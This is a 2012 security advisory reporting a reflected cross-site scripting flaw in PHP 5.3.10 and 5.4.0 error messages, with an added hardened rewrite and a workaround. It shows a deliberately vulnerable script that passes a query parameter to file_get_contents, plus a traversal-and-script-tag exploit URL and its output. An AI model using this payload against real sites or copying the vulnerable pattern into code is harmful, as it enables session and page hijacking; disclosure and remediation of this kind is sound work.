PHP 5.3.10 / 5.4.0 Cross Site Scripting

Posted Apr 9, 2012
Authored by Akastep

PHP versions 5.3.10 and 5.4.0 suffer from a cross site scripting vulnerability when display_errors is set to on and html_errors is set to on.

tags | exploit, php, xss
SHA-256 | 045dd019320c71cb81f5b97a0acf804293d0d1c9b041d0f7f586853578b51c32

=============================================================================================
Vulnerable Software: PHP 5.3.10/5.4.0

php-5.3.10-Win32-VC9-x86.zip (MD5 SUM: af452dfa681ae03ff42eea6d1c7348cd )
php-5.4.0-Win32-VC9-x86.zip (MD5 SUM: b1b0abe883f84eb6d76793aabf1aa612 )
Downloaded from: windows.php.net
=============================================================================================
Tested:
OS:Windows NT SRV2003-A1W2LOM 5.2 build 3790 (Windows Server 2003 Enterprise Edition) i586
Apache from apachelounge.com: Version: 2.2.22.0
=============================INFO============================================================
PHP 5.3.10
OS:Windows NT SRV2003-A1W2LOM 5.2 build 3790 (Windows Server 2003 Enterprise Edition) i586
PHP Version 5.3.10
Build Date Feb 2 2012 20:26:31
Compiler MSVC9 (Visual C++ 2008)
Architecture x86
Configure Command cscript /nologo configure.js
"--enable-snapshot-build" "--disable-isapi" "--enable-debug-pack" "--disable-isapi" "--without-mssql"
"--without-pdo-mssql" "--without-pi3web" "--with-pdo-oci=C:\php-sdk\oracle\instantclient10\sdk,shared"
"--with-oci8=C:\php-sdk\oracle\instantclient10\sdk,shared" "--with-oci8-11g=C:\php-sdk\oracle\instantclient11\sdk,shared"
"--enable-object-out-dir=../obj/" "--enable-com-dotnet" "--with-mcrypt=static" "--disable-static-analyze"
==============================================================================================
PHP 5.4.0
OS:Windows NT SRV2003-A1W2LOM 5.2 build 3790 (Windows Server 2003 Enterprise Edition) i586
Build Date Feb 29 2012 19:20:16
Compiler MSVC9 (Visual C++ 2008)
Architecture x86
Configure Command cscript /nologo configure.js "--enable-snapshot-build"
"--disable-isapi" "--enable-debug-pack" "--disable-nsapi" "--without-mssql"
"--without-pdo-mssql" "--without-pi3web" "--with-pdo-oci=C:\php-sdk\oracle\instantclient10\sdk,shared"
"--with-oci8=C:\php-sdk\oracle\instantclient10\sdk,shared" "--with-oci8-11g=C:\php-sdk\oracle\instantclient11\sdk,shared"
"--enable-object-out-dir=../obj/" "--enable-com-dotnet" "--with-mcrypt=static" "--disable-static-analyze" "--with-pgo"
===============================================================================================


Vuln Desc: Cross Site Scripting Vulnerabilities.
Reason: Misconfiguration in the php.ini-* files regarding the => html_errors <= directive.
Also insufficient sanitization when generating warnings, which can be manipulated from the client side.
The problem is that PHP 5.3.10's php.ini "says":
// Snippet from php.ini-production (this also applies to php.ini-development, except for display_errors)
---------SNIP STUFF ------------------------
display_errors = off
----- SOME CONFIGURATION SNIP------------
; When PHP displays or logs an error, it has the capability of inserting html
; links to documentation related to that error. This directive controls whether
; those HTML links appear in error messages or not. For performance and security
; reasons, it's recommended you disable this on production servers.
; Note: This directive is hardcoded to Off for the CLI SAPI
; Default Value: On
; Development Value: On
; Production value: Off
; http://php.net/html-errors
html_errors = off
------------EOF SNIP STUFF------------------------

I agree that display_errors = off works as expected, but...
Simply change display_errors from Off to On (display_errors = On).
Restart Apache.
And exploit:
(let's say this is the vulnerable script on the server, e.g.:)

cat step2.php
/* BEGIN */
<?php

if(isset($_GET['test']))
{

file_get_contents($_GET['test']);

}


?>
/* = EOF */

Exploit:
http://192.168.0.15/bypass/work/step2.php?test=../../../../../../../../../../../../../../<script>alert(document.location);</script>

From the page source (note that PHP did not pass it through htmlentities; non-persistent cross site scripting vuln):

Warning: file_get_contents(): Unable to access ../../../../../../../../../../../../../../<script>alert(document.location);</script> in C:\Program Files\Apache2.2\Apache2\htdocs\bypass\work\step2.php on line 6

Warning: file_get_contents(../../../../../../../../../../../../../../<script>alert(document.location);</script>): failed to open stream: No such file or directory in C:\Program Files\Apache2.2\Apache2\htdocs\bypass\work\step2.php on line 6

Print screen:
http://s019.radikal.ru/i634/1204/d8/ec8485e212bc.png


The whole problem is that html_errors = off doesn't work as expected. (Am I confused, or?)

(Note: In PHP 5.4.0's php.ini-production, html_errors=On (<= in this state it is disabled). This means it is off by default, because php 5.4.10 too is prone to this.
For testing, change it to Off. It is also vulnerable.)

It "thinks" the OFF state is ON and vice versa (OFF is ON).
You can confirm it simply:
change it to On, then restart Apache and try to exploit as above (it will not work in this case).
Here is the output after changing to => html_errors=On <= (changed to the On state):

From the page source (note that it is passed through htmlentities and safe now):
<br />
<b>Warning</b>: file_get_contents(../../../../../../../../../../../../../../<script>alert(1);</script>) [<a href='function.file-get-contents'>function.file-get-contents</a>]: failed to open stream: Invalid argument in <b>C:\Program Files\Apache2.2\Apache2\htdocs\bypass\work\step2.php</b> on line <b>6</b><br />


In fact, on production servers => display_errors = off (default) <=, so this suppresses all of this stuff. (This mitigates the issue.)

Here are my md5 sums:

me@localhost.localdomain /cygdrive/c/temp/mydirsnap
$ md5sum php-5.3.10-Win32-VC9-x86.zip
af452dfa681ae03ff42eea6d1c7348cd *php-5.3.10-Win32-VC9-x86.zip <= This is from my VirtualBox (same md5 sum)

me@localhost.localdomain /cygdrive/c/temp/mydirsnap
$ md5sum 2/php-5.3.10-Win32-VC9-x86.zip
af452dfa681ae03ff42eea6d1c7348cd *2/php-5.3.10-Win32-VC9-x86.zip <= Just downloaded from windows.php.net (same md5 sum, see below)

me@localhost.localdomain /cygdrive/c/temp/mydirsnap
$ ls -liaR
.:
total 15436
44754521297054585 drwxrwxrwt+ 1 Гость Отсутствует 0 Apr 8 22:57 .
3659174697249195 drwxrwxrwt+ 1 Domain Отсутствует 0 Apr 8 22:57 ..
5629499534273522 drwxrwxrwt+ 1 Гость Отсутствует 0 Apr 8 23:01 2
3659174697298844 -rwxrwxrwx+ 1 Гость Отсутствует 15805513 Feb 13 00:37 php-5.3.10-Win32-VC9-x86.zip <= This is from my VirtualBox

./2:
total 15436
5629499534273522 drwxrwxrwt+ 1 Гость Отсутствует 0 Apr 8 23:01 .
44754521297054585 drwxrwxrwt+ 1 Гость Отсутствует 0 Apr 8 22:57 ..
26177172834151436 -rwxrwxrwx+ 1 user Отсутствует 15805513 Apr 8 22:12 php-5.3.10-Win32-VC9-x86.zip <= Just downloaded from windows.php.net

me@localhost.localdomain /cygdrive/c/temp/mydirsnap


Note: Not tested under Linux. Tested *only* under Windows Server 2003.




********************************************** Workaround *******************************************
After playing with html_errors=on/off, test your server as shown above.
Turn off display_errors in your php.ini (suppress all errors and warnings and do not output
anything to the client side).
****************************************************************************************************
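The following is an added example, not part of Akastep's advisory and not PHP project code: a hardened rewrite of the step2.php script shown above, combined with the runtime equivalent of the workaround just described (display_errors off, errors logged instead of shown). It is written to run on PHP 5.3, the older of the two versions tested here. The base directory name public_files and the helper names resolveSafePath and serve are assumptions chosen for illustration.

```php
<?php
// Added example (not from the advisory): hardened version of step2.php plus the
// workaround's display_errors setting applied at runtime. Written for PHP 5.3+.

// 1. The advisory's workaround: never display errors to the client; log them.
//    php.ini is the right place for this; ini_set keeps the example self-contained.
ini_set('display_errors', '0');
ini_set('log_errors', '1');

// 2. Defence in depth: a handler so that, even if display_errors is re-enabled
//    elsewhere, no request data reaches the browser unescaped. PHP's own
//    plain-text warning (html_errors=Off) would echo $errstr verbatim.
set_error_handler(function ($errno, $errstr, $errfile, $errline) {
    error_log(sprintf('[%d] %s in %s:%d', $errno, $errstr, $errfile, $errline));
    // Shown only for demonstration; escaped, so markup inside $errstr is inert text.
    echo 'Warning: ' . htmlspecialchars($errstr, ENT_QUOTES, 'UTF-8') . "\n";
    return true; // handled: PHP's default display path is skipped
});

/**
 * Resolve a client-supplied name to a file inside $baseDir, or return null.
 * Only a plain file name is accepted, so "../" sequences and markup never
 * reach the filesystem call and therefore never appear in a warning.
 * (Hypothetical helper for this example.)
 */
function resolveSafePath($baseDir, $name)
{
    if (!preg_match('/\A[A-Za-z0-9._-]{1,64}\z/', $name) || $name === '.' || $name === '..') {
        return null;
    }
    $base = realpath($baseDir);
    $real = realpath($baseDir . DIRECTORY_SEPARATOR . $name);
    if ($base === false || $real === false) {
        return null;
    }
    // The resolved path must sit strictly below the base directory.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($real, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $real;
}

/**
 * Serve the requested file or a generic error. The request value itself is
 * never echoed back, so there is nothing for an attacker to inject.
 * (Hypothetical helper for this example.)
 */
function serve($baseDir, $requested)
{
    // Reject missing values and non-strings (e.g. ?test[]=x) up front.
    if (!is_string($requested)) {
        return '';
    }
    $path = resolveSafePath($baseDir, $requested);
    if ($path === null) {
        header('HTTP/1.0 400 Bad Request');
        return 'Bad request';
    }
    $data = file_get_contents($path);
    if ($data === false) {
        header('HTTP/1.0 404 Not Found');
        return 'Not found';
    }
    return $data;
}

// Hypothetical base directory for the files this script is allowed to serve.
$baseDir = dirname(__FILE__) . DIRECTORY_SEPARATOR . 'public_files';
header('Content-Type: text/plain; charset=UTF-8');
echo serve($baseDir, isset($_GET['test']) ? $_GET['test'] : null);
```

Two things change compared with the original step2.php: the request value is validated before it reaches file_get_contents, so the traversal string with the script tag is rejected and never becomes part of a warning; and, should a warning still be produced, the custom handler logs it and escapes anything it prints, so the output no longer depends on whether html_errors or display_errors happens to be On or Off.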


/AkaStep ^_^
Greetz to all:
packetstormsecurity.*,securityfocus.com,cxsecurity.com,security.nnov.ru,securtiyvulns.com and to all others!
Thank you.